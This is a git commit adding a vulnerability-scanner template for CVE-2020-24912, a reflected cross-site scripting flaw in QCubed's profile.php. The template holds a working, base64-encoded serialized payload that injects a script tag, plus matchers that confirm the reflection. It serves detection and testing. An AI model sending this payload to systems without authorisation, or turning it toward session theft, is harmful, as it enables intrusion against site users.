Merge pull request #2676 from pikpikcu/patch-277

Create CVE-2020-24912.yaml
2021-09-15 17:22:13 +05:30 · 2021-09-15 17:22:13 +05:30 · 0039dc77cf
parent 172d2da633 68cdcd3034
commit 0039dc77cf
1 changed files with 35 additions and 0 deletions
--- a/cves/2020/CVE-2020-24912.yaml
+++ b/cves/2020/CVE-2020-24912.yaml
@ -0,0 +1,35 @@
+id: CVE-2020-24912
+
+info:
+  name: QCube Cross-Site-Scripting
+  author: pikpikcu
+  severity: medium
+  description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
+  reference:
+    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24912
+    - http://seclists.org/fulldisclosure/2021/Mar/30
+  tags: cves,cve2020,qcubed,xss
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/assets/_core/php/profile.php"
+      - "{{BaseURL}}/assets/php/profile.php"
+      - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K="
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<script>alert('xss')</script>"
+        part: body
+
+      - type: word
+        words:
+          - 'Content-Type: text/html'
+        part: header